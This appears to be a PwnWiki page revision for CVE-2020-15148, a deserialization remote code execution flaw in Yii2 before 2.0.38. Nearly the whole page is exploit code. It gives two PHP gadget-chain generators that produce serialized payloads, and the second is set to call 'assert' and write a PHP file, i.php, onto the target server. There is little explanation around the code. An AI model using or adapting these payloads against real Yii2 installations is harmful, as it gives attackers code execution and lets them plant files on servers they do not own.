Difference between revisions of "CVE-2020-15148 Yii框架反序列化遠程命令執行漏洞"
From PwnWiki
(Created page with "==INFO== Yii2 <2.0.38 ==EXP== <pre> <?php namespace yii\rest { class Action extends \yii\base\Action { public $checkAccess; } class IndexAction exte...") |
|||
| Line 57: | Line 57: | ||
$exp = new \yii\db\BatchQueryResult($func, $param); | $exp = new \yii\db\BatchQueryResult($func, $param); | ||
print(serialize($exp)); | print(serialize($exp)); | ||
| + | </pre> | ||
| + | |||
| + | ==EXP 2== | ||
| + | 来源:[https://xz.aliyun.com/t/8307 CVE-2020-15148 Yii2反序列化RCE POP链分析 ] | ||
| + | |||
| + | <pre> | ||
| + | |||
| + | <?php | ||
| + | namespace yii\rest{ | ||
| + | class CreateAction{ | ||
| + | public $checkAccess; | ||
| + | public $id; | ||
| + | |||
| + | public function __construct(){ | ||
| + | //$this->checkAccess = 'system'; | ||
| + | //$this->id = 'ls -la'; | ||
| + | $this->checkAccess = 'assert'; | ||
| + | $this->id = 'file_put_contents("i.php","<?php phpinfo()?>")'; | ||
| + | } | ||
| + | } | ||
| + | } | ||
| + | |||
| + | namespace Faker{ | ||
| + | use yii\rest\CreateAction; | ||
| + | |||
| + | class Generator{ | ||
| + | protected $formatters; | ||
| + | |||
| + | public function __construct(){ | ||
| + | $this->formatters['close'] = [new CreateAction, 'run']; | ||
| + | } | ||
| + | } | ||
| + | } | ||
| + | |||
| + | namespace yii\db{ | ||
| + | use Faker\Generator; | ||
| + | |||
| + | class BatchQueryResult{ | ||
| + | private $_dataReader; | ||
| + | |||
| + | public function __construct(){ | ||
| + | $this->_dataReader = new Generator; | ||
| + | } | ||
| + | } | ||
| + | } | ||
| + | namespace{ | ||
| + | echo base64_encode(serialize(new yii\db\BatchQueryResult)); | ||
| + | } | ||
| + | ?> | ||
| + | |||
| + | |||
</pre> | </pre> | ||
Revision as of 10:06, 10 May 2021
INFO
Yii2 <2.0.38
EXP
<?php
namespace yii\rest {
class Action extends \yii\base\Action
{
public $checkAccess;
}
class IndexAction extends Action
{
public function __construct($func, $param)
{
$this->checkAccess = $func;
$this->id = $param;
}
}
}
namespace yii\web {
abstract class MultiFieldSession
{
public $writeCallback;
}
class DbSession extends MultiFieldSession
{
public function __construct($func, $param)
{
$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
}
}
}
namespace yii\base {
class BaseObject
{
//
}
class Action
{
public $id;
}
}
namespace yii\db {
use yii\base\BaseObject;
class BatchQueryResult extends BaseObject
{
private $_dataReader;
public function __construct($func, $param)
{
$this->_dataReader = new \yii\web\DbSession($func, $param);
}
}
}
$exp = new \yii\db\BatchQueryResult($func, $param);
print(serialize($exp));
EXP 2
来源:CVE-2020-15148 Yii2反序列化RCE POP链分析
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
//$this->checkAccess = 'system';
//$this->id = 'ls -la';
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("i.php","<?php phpinfo()?>")';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction, 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
